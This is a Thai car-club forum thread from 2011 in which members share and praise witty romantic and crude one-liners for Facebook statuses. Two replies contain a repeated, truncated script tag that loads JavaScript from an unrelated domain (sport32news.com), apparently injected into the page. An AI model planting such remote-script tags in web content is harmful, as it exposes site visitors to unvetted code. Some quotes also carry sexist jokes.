ตอบ
merscie

ชื่อเล่น: เปี๊ยก คับ

เข้าร่วม: 08 มิถุนา 2009
ตอบ: 2665

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2743
ให้คำขอบคุณ: 2209

ที่อยู่: Civic ES Origin's Inspiration Clan กรุงเทพ นนทบุรี ระยองฮิ นราธิวาส
ปี: 2004
จันทร์, 16 พฤษภาคม 2011 21:16 - คำคมโดนๆ เอามาฝากคับ
คนที่ "รัก" จะช่วย share ...คนที่ "แคร์" จะกด Like ^~

ได้พูด ได้คุย เราก็อยากได้ใจ... พบเจอกันเมื่อใด เราก็อยากได้กัน!!

ผู้หญิงดีดี มีแฟนเป็นตัวเป็นตน , แต่ผู้หญิงที่ดิ้นรน มีแฟนกี่คนก็ไม่พอ!!!

ชอบโพสต์ให้"กด Like"ชอบใครให้"กดตังค์" 55+

หนาวจนเหน็บ ดีกว่าเจ็บจนชา... รักเทอจนบร้า ดีกว่าโหยหา.. แต่ไม่เจอ..(^^)

คิดถึงนะ , ไม่ใช่ประโยคบอกเล่า , แต่เป็นประโยคบอกเธอ..^^

เห็นฉันเป็นอะไร..ตัวตาย-ตัวแทน , หรือ..เป็นแค่.." แฟน สแตนอิน "!!!

ฉันเป็นลูกครึ่งจีน "คุณพ่อใช้แซ่ " "คุณแม่ใช้ โซ่ " ^^ 555+

เหล้า!!!... กินที่ปาก.. เมาที่ขา... หมาที่ปาก..^^"

บางอย่าง " ถูกทิ้ง " , เพื่อให้บางสิ่ง " คงอยู่ "...

อย่าเงียบหายไป..เพราะหัวใจผมไม่ใช่ Memory Stick ..จะได้มีความจุเป็นกิ๊ก ไว้จดจำคนทั้งชีวิตที่เข้ามา.

อยู่เป็นโสดให้รุ้ว่า "หยิ่ง"... ดีกว่าถูกทิ้งเพราะ "ใจง่าย" !!

คนบางคนใช้คำว่า "ขอโทษ".. เพื่อให้มี..โอกาสแต่บางคนยอม "เสียโอกาส" ..เพียงเพราะไม่อยากพูดคำว่า..ขอโทษ..

"ถ้ารู้น้อยกว่าจุดที่กำลังยืน...ถอยกลับไปก้าวหนึ่งเพื่อเรียนเพิ่ม...
ถ้ารู้มากกว่าจุดที่กำลังยืน...ก้าวไปข้างหน้าให้คุ้มกับที่รู้...เพื่อสุดท้ายไม่ต้องตายเยี่ยงคนย่ำอยู่กับที่"

สตางค์มาสติหมด...สตางค์หมดสติมา!!!!!!!!

ที่เจ็บเพราะ [มีใจ]... ที่ร้องไห้เพราะ [ผิดหวัง]... ที่เหงาเพราะ [ลำพัง]... ที่ระวังเพราะ [ยังกลัว]!!!

คนบางคนใช้คำว่า "ขอโทษ".. เพื่อให้มี..โอกาสแต่บางคนยอม "เสียโอกาส" ..เพียงเพราะไม่อยากพูดคำว่า..ขอโทษ...

บางอย่าง " ถูกทิ้ง " , เพื่อให้บางสิ่ง " คงอยู่ "...

ปืนฆ่าเราได้..เราตายไปเราก็ไม่หายใจเเละรู้สึกเจ็บเเค่ตอนเเรก... เเต่คำว่า"เลิก"..สามารถฆ่าเราได้โดยที่เรายังหายใจอยู่เเละมันจะไม่"เจ็บ"เเค่ตอนเเรก..!

" ความเข้าใจ " สำคัญต่อความรัก ,..แต่สิ่งสำคัญยิ่งกว่าคือ..ยังคงรักกันแม้ในวันที่ " ไม่เข้าใจ " ~

ควายถึงมันโง่....แต่มันไม่เคยหลอกใคร... แต่มนุษย์ที่ขาดความจริงใจ....สมควรให้ไปกราบ"ควาย"!

ความเงียบ คือ การบอกเลิกที่เสียงดังที่สุด

ความรักไม่สามารถเปรียบได้กับการตบมือหรอก ตบมือข้างเดียวไม่เจ็บ แต่รักข้างเดียว "เจ็บ"

อาการ "เขิล" เป็นอาการที่ร่างกายสร้างขึ้นมาเพื่อให้เช็คว่า ใครคือ "คนพิเศษ"

"เป็นแฟนกันนะ" ไม่ใช่ประโยคคำถาม แต่เป็นประโยคขอร้อง
"เป็นเพื่อนกันเถอะ" เป็นทั้งประโยคปฏิเสธ และประโยคคำสั่ง

"ดีเกินไป.." ก็ไม่ใช่ประโยคบอกเล่าหรือประโยคปฏิเสธ แต่เป็นประโยคบอกเลิก

บางทีเราก็กลัวคำตอบเกินไป จนไม่กล้าตั้งคำถาม..

ไม่รู้ว่าเริ่มจีบเธอมาตั้งแต่เมื่อไหร่ รู้แต่ว่า รักเธอมานานแล้ว

บางคนทำดีกับเราเพราะเค้าเป็นคนดี ไม่ใช่ว่าเค้ารู้สึกดี

ที่ผมไม่โทรหาคุณทุกวันเนี่ย ไม่ใช่เพราะผมไม่ใส่ใจนะ.. แต่อยากให้คุณได้รู้จักอารมณ์คิดถึงบ้าง

ผมคุยกับคนที่เกลียดวาเลนไทน์ ผมบอกเค้าว่า “แกเป็นทุกข์กับความสุขคนอื่น แกมันขี้อิจฉา”
ตอนนี้เค้าไม่ได้เกลียดวาเลนไทน์แล้ว เค้าเกลียดผม แทนหล่ะ

เคยสงสัยไหมว่าทำไม "เราเป็นแฟนกันเถอะ" ถึงเป็นประโยคคำถาม
แต่ "เราเป็นเพื่อนกันเถอะ" ถึงเป็นประโยคบอกเล่า

ที่ฉันไลค์รูปของเธอ ไลค์ข้อความของเธอ ไลค์สถานะของเธอ ความจริงแล้วฉันต้องการจะบอกว่า " ฉันไลค์ทุกอย่างที่เป็นเธอ "

บางที เราควรจะขอบคุณที่เค้าเลวร้ายใส่..อย่างน้อยมันก็ทำให้เราตัดใจจากเค้าได้ง่ายขึ้น

--[ไม่ได้ตั้งใจมีแฟนไว้แค่ให้มีคนชวนไปดูหนัง แต่อยากได้คนที่ยังนั่งคุยกันได้ตอนแก่-แก่]--

--[คนบางคน ฉันเพิ่มเป็นเพื่อนไม่ได้ ลบออกจากความทรงจำก็ไม่ได้ T^T]--

อยากให้ชีวิตที่เรียบง่ายกลายเป็นวุ่นวาย ก็แค่เพิ่มผู้ชายเข้าไปในชีวิต ^^
Woman's life is simple but when you add a man in it, then it will be complicated.

วิธีที่ดีที่สุดในการวิพากษ์วิจารณ์งานของคนอื่น ๆ ก็คือ คุณจงทำงานของคุณให้ดี่ขึ้น ! BY: อ. ธงชัย ประดับชนานุรัตน์

มือร้อนเพราะยังไปจับกาน้ำอยู่ ปล่อยมือไป ถึงกาน้ำจะร้อน เราก็ไม่ร้อนแล้ว

อย่า สูญ เสีย "ตัวตน".. เพราะ ขี้ ปาก ของ คน ที่ไม่ รู้ จัก "ตัวคุณ"..!!!

ฉันสร้างกำแพงขึ้นมา.. ไม่ใช่เพื่อปิดกั้นคนอื่น.. เพียงแต่อยากรู้ว่า .. ใครคือ คนที่รักฉันมากพอ.. และข้ามมาจนได้ในที่สุด ^^

"ปากอย่าไว.. ใจอย่าเบา ..เรื่องเก่าอย่าไปรื้อฟื้น.. เรื่องอื่นอย่าไปคิด.. อดีตคือความฝัน.. ปัจจุบันคือความจริง"

"แฟน" จบกันไป.. ก็มีแต่ "อดีต"... แต่ถ้า "เรียน" จบมา.. ก็มีแต่ "อนาคต" ~

ผู้หญิงถ้ายังไม่อยากหมดโปร... ก้ออย่าเพิ่งรีบโชว์สิ่งที่แม่ให้มา"!!555

ที่ผู้หญิงชอบอ่านนิยายน้ำเน่า ก็เพราะผู้ชายดีๆ มันมีอยู่แค่ในนิยาย... ส่วนที่เหลือก็มีแต่พวก (ตื๊ด)หาย เลยต้องพึ่งนิยาย ถึงจะเจอผู้ชายดีๆ!!

อยาก "รู้ความหมาย " ของคำว่ารักให้ไปหาที่ "google"... แต่ถ้า "อยากเจอรัก" แนะนำให้มาที่ "กูนี่ "!!

อย่าตีหน้า "เศร้า" แร้วเดินมาบอกกุว่า "เจ็บ"... เพราะกุเป็นพวกตีหน้า "เซ็ง" แต่ "เจ็บ" กว่ามึงหลายเท่า!!

ผู้ที่ "" บริสุทธิ์ "" จากภายในจริง ๆ,,,,,ย่อมไม่มีทางที่จะ "" สกปรก "" จากภายนอกได้...

กูไม่ใช่ "โฟมล้างหน้า"...จะได้มีค่าเวลามึงเบื่อ "หน้ามัน"!!!

ความผิดมี 2 ประเภท คือ ''ผิดที่กู'' กับ ''กูที่ผิด''...!

ถ้าไม่ชอบ คือไม่ใช่ , ถ้าไม่ใช่ คือไม่เอา...แต่ถ้าชอบ แล้ว ก็ใช่ , ถึงไม่ให้ ก็จะเอา!!

การ "นอกใจแฟน" ไม่จำเป็นต้องค้นหาวิธีการ.. เพียงแค่คุณใช้ "สันดาน" ก็นอกใจแฟนได้แล้วแหละ !! 555 จิงม่ะ!

ทางเดินที่ "ชอบ" อาจพาเราเดินไปได้ไกล...แต่ทางเดินที่มี "ใคร" อาจไปได้ ไกลกว่าเดิม....

เขียนผิดก็ลบได้, เพราะเราใช้แค่ "น้ำหมึก" ...แต่นี่มัน "ความรู้สึก" ...ลบ "จิตสำนึก" ได้ยังไง!

ผู้ชายเหมือนกรมอุตุฯ : เชื่อถือไม่ได้ ...ผู้หญิงเหมือนอากาศ อย่าทำนาย : เพราะเปลี่ยนแปลงได้ตลอดเวลา

ไม่มีสเป็ก เวลาสปาร์ค..... แต่ว่าเรามีสปิริต ถ้าสตาร์ทไม่ติด เราก็สต๊อป..

ฉัน "like" เธอ.. กับ ฉัน "ไร้" เธอ..เป็นคำพ้องเสียง แต่ไม่พ้องความหมาย......

การแตกสลายของหัวใจหาได้ส่งเสียงดังราวกับระเบิด...บางครั้งมันอาจเงียบเชียบราวกับขนนกที่ร่วงหล่น..และสิ่งที่เจ็บปวดที่สุดคือไม่มีใครได้ยินยกเว้นตัวฉันเอง!

ตัวเลือก … สี่งที่ทุกคนอยากจะมี แต่ไม่อยากเป็น ~

ทีพิมพ์ลง keyboard อ่ะกล้า แต่พอเจอหน้าถึงกับพูดไม่ออก!

ความเงียบ คือ การบอกเลิกที่เสียงดังที่สุด

กินไม่ผสม เรียกเพียว
กินอยู่คนเดียว เรียกเหงา
กินพร้อมกับเธอ เรียกเรา
แต่เธอกินกับเขา เรียกว่า"เหงาแบบเพียวๆ"

อย่าตีหน้า "เศร้า" แร้วเดินมาบอกกุว่า "เจ็บ"
เพราะกุเป็นพวกตีหน้า "เซ็ง" แต่ "เจ็บ" กว่ามึงหลายเท่า

เวลาเล่น MSN คุยกับเธอฉันมีสถานะออนไลน์ แต่ถ้าเวลาใดที่ฉันอยู่กับเธอฉันมีสถานะเป็นอะไร ??

"คนที่ไม่ใช่" ทำมา100 แต่ได้คะแนน แค่ 1 "คนที่ใช่" ทำมาแค่1 แต่อาจได้คะแนนเป็น 100

คำว่า"รัก"บอกเร็วเกินไปก็ดูไร้ค่า บอกช้าเกินไปก็คงไม่มีประโยชน์

บางคนรักเขา"ไม่กล้าบอก" แต่บางคนกลับหลอกแม้กระทั่งคนที่"บอกรัก”

รู้มั้ยทำไมถึงบอกว่า "เมาเหล้า" ดีกว่า "เมารัก" เพราะ "อาการแฮงค์" ฟื้นตัวเร็วกว่า "อาการเฮิร์ท"

สิ่งที่คนโสดควรเรียนรู้ คือ คนมีคู่เขาเอาใจสาวอย่างไร
สิ่งที่คนมีแฟนควรเรียนรู้ คือ คนไม่มีคู่เขาอยู่ได้อย่างไรในวันเดียวดาย

"ฤดูหนาว" ถูกสร้างไว้เพื่อให้รู้ว่า..คนเราไม่ควรอยู่คนเดียว

เพราะรักดอกจึงหลอกปล้ำ!

ความรักเป็นสิ่งมีค่า ... ไม่ใช่แค่ "แก้ผ้า" และ ลีลาที่เร้าใจ

ผู้ชายคนนี้ ไม่ได้มีไว้รัก เเต่มีไหล่ให้เธอพักยามเสียใจ ^^

คนโสดก็เหมือนต้นไผ่ ข้างนอกดูแข็งแกร่งเพียงใด แต่ข้างในมัน"ว่างเปล่า"

เช้ากินข้าวไม่ลงเพราะคิดถึง เที่ยงกินอะไรไม่ได้เพราะคิดถึง
เย็นก็ไม่อยากกินเพราะคิดถึง พอดึกๆก็นอนไม่หลับเพราะว่า หิว !!

สังคมมนุษย์สมัยก่อนสงบสุขกว่าตอนนี้ ตอนที่AppleและBlackberryยังเป็นแค่ผลไม้

เวลาเธอเหงาไม่มีใคร ให้มอง Keyboard ไว้ ว่าจะมี I อยู่ข้าง U เสมอ

ข้าง I ยังมี U แต่ทำไมข้างกู ไม่มีใคร

ถึงเราจะไม่ใช่ กสิกรไทย แต่ถ้าเป็นเรื่องของ "หัวใจ" ..ฝากให้เราช่วยดูแล

ความรักให้ได้แค่ครั้งละคน แต่ ความเชื่อใจให้ได้แค่คนละครั้ง ^^~

ไม่รู้ว่าพระจันทร์ข้าง ขึ้นหรือข้างแรม รู้แค่ชอบดุพระจันทร์ข้างเธอ

"อย่าเอาความเหงามาลงที่ฉัน แต่ถ้าความมันส์จัดเต็มเลยจ้า"

"ความรู้สึก" บางอย่าง แม้จะอยาก "ระบาย" ให้คนอื่นรับรู้บ้าง แต่มันก็ยากเกิน "บรรยาย" ออกมาเป็น "คำพุด" ได้

ผู้หญิงที่ "ฉลาด" รู้จัก "สร้างกระแส" ... แต่!! ผู้หญิง "ตอแหล" มักชอบ "สร้างภาพ" !! ...

มีคนเค้าบอกว่า "ความเจ็บ" ที่ไม่มีเสียง นั่นเพราะ "เค้าหมดใจ ที่จะฟัง"

มีคนเค้าบอกว่า หากความรักที่ให้ไป "ไม่มีค่า" ก็ขอให้นึกถึง "ท่วงท่าและลีลาที่เร้าใจ"

มีคนเค้าบอกว่า ที่เราต้องเจ็บไม่ใช่เพราะเธอจากไป แต่เพราะ "ความรัก . . . ยังคงอยู่"

คนเหงา คือคนที่ไม่เคยมีแฟน
คนที่เหงามาก คือคนที่เคยมีแฟน
คนที่เหงาที่สุด คือคนที่มีแฟนแล้วเหมือนไม่มีใคร

รักเธอมันขม ก็ซดนมดีกว่า
รักเธอมันเน่า ซดเหล้าดีกว่า

รักเธอก็เหมือน "สายเน็ต" เมื่อเธอเจอ "ไวเลต" สายเน็ตก็ไร้ค่า

ที่ "โสด" หน่ะเรื่องจริง ที่"ซิง" หน่ะ ข่าวลือ

มื้อเช้า = มาม่า
มื้อกลางวัน = ไวไว
มื้อเย็น = ยำยำ
ถึงจะจน แต่ก็จนอย่างไม่จำเจครับ

สาวโสดหน่ะมีจริง
สาวซิงหน่ะมีมั๊ย

สวยเม้นฟรี หุ่นดีกดlikeมา

แผลที่ตัว มี "เลือดสีแดงๆ" ไหล... แผลที่ใจ มี "เลือดใสๆ" ไหลออกจาก "ตา" ...

รัก คือ รอ ท้อ คือ แพ้ รักที่รอ คือ รักแท้ ถึงแพ้ก็จะรอ *0*

เสียใจไม่ว่า แต่อย่าทำให้ เสียความรู้สึก เพราะต่อให้คุณ "สำนึก" ความรู้สึกก็ไม่กลับมา

เด่นเรื่อง"คารม" แต่ มีปมเรื่อง"ความรัก"

ปลอดภัย เมื่อไกลเมีย

ถ้า"มีน้ำเต้า"อาจยังมี ..ปู..ปลา ,,, แต่ถ้ามีน้ำตา อาจหมายความว่าไม่มีใคร . . .

ถึงหน้าตาจะติดลบ แต่ลองคบจะติดใจ

ถ้าหล่อแล้วมีเสน่กับเพศเดียวกัน กูยอมแล้วกัน! เพราะกูอยากสืบพันธุ์กับเพศตรงข้าม

ภรรยาเหมือนเสื้อผ้า
ขาดหรือหายไปก็หาไหม่ได้
พี่น้องเหมือนแขนซ้ายขวา
ขาดแล้วยากที่จะต่อได้

คำ..."อธิบาย"ชอบเอามาใช้ในวันที่ไร้ประโยชน์
คำ..."ขอโทษ" ชอบเอามาใช้ในวันที่....สาย
คำว่า..."รัก "ชอบเอามาพูดกั๊ก...ตอนมัน"เสียดาย"
และคำพูด....อีกมากมาย ที่เอามาล่อให้กลับไป อยู่ในคอกควายเช่นเดิม!!

การบินไทยรักคุณ "เท่าฟ้า" , คนธรรมดา รักคุณ "เท่าเดิม."

ความโสดไม่ใช่เนื้อคู่, ไม่ต้องอยู่ติดกูตลอดก็ได้

ถึงชั่ว ก็ผัวเธอ

อย่าหาเหตุผลจากผู้หญิง และอย่าหาความจริงจากผู้ชาย

อกหักก็เหมือนแผ่นดินไหว เห็นคนมีคู่ทีไรหัวใจก็อาฟเตอร์ซ็อก

ต่อให้คำคมเป็นเข่ง สุดท้ายรถเก๋งก็คาบไปแดก

เมื่อหลายปีก่อนเคยเล่นมุขปืน2กระบอก จะได้มี "กันและกัน" แต่มาวันนี้คงเล่นมุขนั้นไม่ได้อีกแล้ว เพราะมีแต่ "เขาและเธอ"

ผู้หญิงคือต้นไม้ ผู้ชายคือคนสวน เพราะต้นไม้ช่างเย้ายวน คนสวนก็เลย"ฟัน"

ทำดี ไม่เอาหน้า , แต่ทำ ทุกท่า เพื่อให้ลูกออกมา หน้าตาดี

เทียนใข...มีน้ำตาเพราะความร้อน
คนใจอ่อน...มีน้ำตาเพราะความรัก

ความหล่อไม่คงที่ แต่ความเสี่ยวพี่คงทน

ผมมีแต่ พะอันทวง

วงกลม/วงรี จะเริ่มจาก จุดๆหนึ่ง ละลากเส้นโค้งมายังจุดเดิม
ก็อยากให้เธอเป็นจุดนี้...เพื่อให้เธอ เป็นรอย ที่รอ curve .... เป็น Love ที่ รอคอย

100 คนรัก ไม่เท่า 1 คนที่ภักดี
100คำหวานที่มี ไม่เท่า1คำที่จริงใจ

แก่แต่สังขาร ... แต่สันดานทารก

หล่อเลือกได้
แต่รวยเลือกก่อน

เจ้าชู้ไม่ใช่นิสัยพี่ , ไว้น้องหน้าดี , แล้วน้องจะเข้าใจ

กำลังอยู่ในช่วงปรับปรุง...

กูไม่ใช่"อิชิตัน"ที่ดื่มกีวีแล้วแถมอัญชัญ แต่ถ้า(คุณ)จะมีมัน...ก็อย่ามีกู!!!

อาจจะดูไม่มีค่า แต่ถ้าถามถึงท่ากูมีครบ

ทุกข์-สุข เราจะอยู่ด้วยกัน , ทุกเสาร์ เราจะแยกกันเที่ยว

จะลืมใคร"อย่าพึ่งเวลา" , ขนาดนาฬิกายัง"วนมาที่เดิม"

ไม่หล่อ...แต่มีท่ายาก

รักครั้งเก่าใช่ว่าจะไม่ดี , แต่ถ้ามีรักครั้งใหม่อีกที "จะทำให้ดีกว่าเดิม"

ตาโต" เมื่อถูกเธอ "สวมกอด" , แต่แทบ "ตาบอด" เมื่อถูกเธอ "สวมเขา"

เหนือกว่าผู้ชายที่ " เจ้าชู้ " , คือผู้หญิงที่ " รู้ทัน "

เธอยุ่ง "ฉันเข้าใจ" , เธอไม่มีเวลา "ฉันเข้าใจ" , เธอลืมเค้าไม่ได้ "ฉันเข้าใจ" , ถ้าวันนึงฉันหมดรักเธอ ฉันหวังว่า "เธอจะเข้าใจ"

ถ้าไม่เลิกเจ้าชู้ ก็อย่าให้รู้ว่ามีหลายคน

เศษแก้วมันบาดตีนคน
เศษคำคมมันบาดใจตู

อย่าปล่อยให้สเตตัสว่างเปล่า...เพราะอาจจะมีคนเหงาเฝ้า Like คุณอยู่

"เขา อ่านว่า ขอ เอา เขา"

รักใคร!!! อย่าสนใจ Past Tense.....
แต่ควรทำ Present ให้มันเป็น Perfect

ถึงต้นงิ้วจะมีหนาม แต่ถ้าดอกงิ้วงาม กุก้อจะปีนนนนนน

ขณะนี้ไม่สามารถ "อัพเดทสเตตัส" ได้. . . . เพราะไม่รู้ว่าตัวเองอยู่ใน "สถานะ" อะไร

หน้าที่ของคน "โสด" คือ หาคนที่ดีที่สุดมาเป็นแฟน :: หน้าที่ของ "คนมีแฟน" คือ หาคนที่ดีกว่าแฟนมาแทนที่

I'm not a Facebook status, You don't have to LIKE me.

ที่บางคน'งอน' เพราะอยากให้อีกคน'ง้อ'
แต่ถ้าอีกคนไม่'ง้อ' คนที่ท้อคือบางคนที่'งอน'

พี่โดมได้เจอกับ รักไม่มีวันตาย แต่คนโสดมากมายพบกับ "รักไม่มีวันเจอ"

อันที่จริงผมไม่ได้ serious แต่ผมจะเครียดถ้าไม่ได้ see you

ทนเดิน , เพราะที่เดิม , ไม่มีให้ยืน

ผู้ชายก็คน เจ็บได้ ร้องไห้เป็น!

มื่อก่อนมีแค่เทอกับฉัน แล้วตอนนี้มันมาจากกกไหนนน

บอกกับแฟนว่าไม่มีใคร บอกกับใครๆว่าไม่มีแฟน

ไม่ใช่ทั้ง"ตัวจริง"และ"ตัวสำรอง" เพราะตอนนี้ไม่รู้ว่าเป็น"ตัวอะไร" ...ด้วยซ้ำ

ตั้ง Status "โสด"ไม่ได้เรียกร้องความสนใจจากใคร...แต่มีไว้เพื่อ "สะกิดใจ"ใครบางคน...

เสียใจไม่ว่า แต่อย่าทำให้ เสียความรู้สึก เพราะต่อให้คุณ "สำนึก" ความรู้สึกก็ไม่กลับมา

ผิดเองที่มาช้า ผิดมากถ้าเป็นชู้ ไม่ผิดเพราะไม่รู้ เเต่ที่เป็นชู้ เพราะรู้ช้า

รักของพี่นั้นมีเเต่ได้

เมื่อคนเราอยู่ใกล้กันตลอดเวลา เราอาจจะลืมความหมายของคำว่า คิดถึง (¬_¬)

ไม่อยากเชื่อว่ากิจกรรมที่ใช้พลังงานน้อยๆอย่างการ "รอ" จะทำให้เหนื่อยได้มากถึงขนาดนี้

ถ้ารู้ตัวว่ามี "เจ้าของ" กรุณาอย่ามองใคร "เผื่อไว้" ถ้ารู้ตัวว่ายังมี "หัวใจ" กรุณาอย่า "คบใคร" เป็นเพียงแค่ที่ "คั่นเวลา"

อย่ามาบอกว่าไม่มีเวลา ทั้งๆตัวเองก็ใส่นาฬิกาอันเท่าควาย

บางคนแค่ "รู้สึกดี" แต่ไม่ได้ "รู้สึกรัก" ...อย่าคิดไปเอง

ทนได้เท่าที่ทน เป็นคนไม่ใช่หิน ที่เงียบใช่ว่า"ชิน" มันได้ยิน แต่ "ทำใจ"

ดีไม่พอ ยังรู้ข้อแก้ไข แต่ดีเกินไป ไม่รู้ควรทำงัยดี

คนที่''ไม่มีใคร''เทศกาลอะไรก็ไม่สำคัญ

รักเหมือนเดิม แต่อยากได้ยินเพิ่ม คือ "รักเหมือนกัน

รักมากก็เจ็บมาก รักไม่มากก็ เจ็บไม่น้อย รักที่ต้องรอคอย เจ็บไม่น้อยแต่นานมาก

ผู้ชายบางคน ไม่ได้ "เลวกว่าหมา" แต่ผู้หญิงบางคนมัน "ดราม่า" จนไม่รู้จะอธิบายยังไง

ตัวเลือก … สี่งที่ทุกคนอยากจะมี แต่ไม่อยากเป็น

เดินคนเดียวมันเปลี่ยวใจ แต่ดีกว่าเดินกับใครแล้วเหมือนเดินคนเดียว

อย่าปล่อยให้ "คนแรก" ของหัวใจ มาทำร้าย "คนสุดท้าย" ให้บอบช้ำ!
อย่ามัวแต่ดูแล "คนแรก" ในความทรงจำ.. จนเผลอเหยียบย่ำ "คนสุดท้าย" ของหัวใจ

คนมีคู่เค้าไม่รู้หรอกว่า " คนโสด " เค้าลั้นลากันมากแค่ไหน

อย่ารังแกคนที่ " ไม่มีตังค์ " ...... ด้วยคำว่า " ยืม " เลย

‎"กอด"คือเสื้อที่ไม่มีไซด์ แค่สวมใส่ก็"อบอุ่น

ไม่ได้กลัวรักไม่เท่ากัน , แต่กลัวรักมัน ไม่เท่าเดิม

โลกเรานี้แปลก , คนมีแฟนแอ๊บโสด , คนโสดแอ๊บมีแฟน
ได้รับคำขอบคุณจาก: klaoies  A-u-T-o-N-o-m-Y  Phetcharat  Favonius  KJ-nui  Nung_Sodapop  benzd  prodrive  Surayut  littleguy  skrtel23  marcuz  puyzaaaaa  tonaff  ming  MADBOY  bomtik  nuchar  kinikuman  bank  honeybeex7 
NINJASIAM

ชื่อเล่น: นิน

เข้าร่วม: 06 มกรา 2010
ตอบ: 1621

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2025
ให้คำขอบคุณ: 4537

สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 16 พฤษภาคม 2011 21:44 - คำคมโดนๆ เอามาฝากคับ
โดนๆแบบนี้ ขอไปอัพลง Facebook ทุกชั่วโมงเอาให้ครบเลย

ปล.ขอบคุณจ้า
ได้รับคำขอบคุณจาก: merscie  bomtik 
Phetcharat

ชื่อเล่น: ต้น

เข้าร่วม: 15 กุมภา 2011
ตอบ: 1908

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1429
ให้คำขอบคุณ: 9944

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 16 พฤษภาคม 2011 21:46 - คำคมโดนๆ เอามาฝากคับ
ได้พูด ได้คุย เราก็อยากได้ใจ... พบเจอกันเมื่อใด เราก็อยากได้กัน!!
<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: merscie 
bank

เข้าร่วม: 06 ตุลา 2010
ตอบ: 2269

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 918
ให้คำขอบคุณ: 5506

สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 16 พฤษภาคม 2011 21:54 - คำคมโดนๆ เอามาฝากคับ
หนาวจนเหน็บ ดีกว่าเจ็บจนชา... รักเทอจนบร้า ดีกว่าโหยหา.. แต่ไม่เจอ..(^^)
โดนงับ
catsteal

ชื่อเล่น: อ๋อง

เข้าร่วม: 08 เมษา 2010
ตอบ: 3841

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3145
ให้คำขอบคุณ: 124

สี: น้ำเงิน วิวิด (มุก) (B-502P)
จันทร์, 16 พฤษภาคม 2011 22:11 - คำคมโดนๆ เอามาฝากคับ
เฟสบุ๊คล้วน
klaoies

ชื่อเล่น: เก้าอี้

เข้าร่วม: 25 มิถุนา 2009
ตอบ: 241

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 1169
ให้คำขอบคุณ: 348

ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 16 พฤษภาคม 2011 22:17 - คำคมโดนๆ เอามาฝากคับ
แต่เธอกินกับเขา เรียกว่า"เหงาแบบเพียวๆ

KJ-nui

ชื่อเล่น: หนุ่ย

เข้าร่วม: 04 เมษา 2011
ตอบ: 2041

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1410
ให้คำขอบคุณ: 2221

ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 16 พฤษภาคม 2011 22:19 - คำคมโดนๆ เอามาฝากคับ
deo20

เข้าร่วม: 16 ธันวา 2010
ตอบ: 970

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1192
ให้คำขอบคุณ: 107

จันทร์, 16 พฤษภาคม 2011 22:43 - คำคมโดนๆ เอามาฝากคับ
prodrive

เข้าร่วม: 28 พฤศจิกา 2008
ตอบ: 742

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1271
ให้คำขอบคุณ: 1000

จันทร์, 16 พฤษภาคม 2011 23:04 - คำคมโดนๆ เอามาฝากคับ
sevenartz

ชื่อเล่น: อาร์ท

เข้าร่วม: 17 มีนา 2010
ตอบ: 1321

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2847
ให้คำขอบคุณ: 20

ปี: 2001
สี: น้ำเงิน วิวิด (มุก) (B-502P)
จันทร์, 16 พฤษภาคม 2011 23:29 - คำคมโดนๆ เอามาฝากคับ
.. ได้ของ ไปลงเฟสบุค แล้นนน ขอบคุณครัฟ ...
Surayut

ชื่อเล่น: ชาลาแลมป์

เข้าร่วม: 04 มีนา 2010
ตอบ: 181

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 184
ให้คำขอบคุณ: 824

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 16 พฤษภาคม 2011 23:56 - คำคมโดนๆ เอามาฝากคับ
โดนๆเลย

สตางค์มาสติหมด...สตางค์หมดสติมา!!!!!!!!

<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
PaeSpaellow

ชื่อเล่น: แป๊ะ

เข้าร่วม: 21 กุมภา 2011
ตอบ: 917

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 799
ให้คำขอบคุณ: 579

อังคาร, 17 พฤษภาคม 2011 09:10 - คำคมโดนๆ เอามาฝากคับ
merscie

ชื่อเล่น: เปี๊ยก คับ

เข้าร่วม: 08 มิถุนา 2009
ตอบ: 2665

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2743
ให้คำขอบคุณ: 2209

ที่อยู่: Civic ES Origin's Inspiration Clan กรุงเทพ นนทบุรี ระยองฮิ นราธิวาส
อังคาร, 17 พฤษภาคม 2011 19:23 - คำคมโดนๆ เอามาฝากคับ
จัดลงเฟสด่วนๆๆๆๆคับ อิอิ
skrtel23

ชื่อเล่น: แดงส์

เข้าร่วม: 27 ธันวา 2009
ตอบ: 136

ได้รับคำขอบคุณ: 144
ให้คำขอบคุณ: 133

สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 18 พฤษภาคม 2011 00:31 - คำคมโดนๆ เอามาฝากคับ
โดนจิงๆคับ ขออนุญาตลง FB หน่อยนะคับ
Makai

ชื่อเล่น: มะไก่

เข้าร่วม: 16 พฤษภาคม 2010
ตอบ: 3940

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2065
ให้คำขอบคุณ: 3430

พุธ, 18 พฤษภาคม 2011 01:58 - คำคมโดนๆ เอามาฝากคับ
สวดยอดดดเลยคร้าบบบบบ
puyzaaaaa

ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

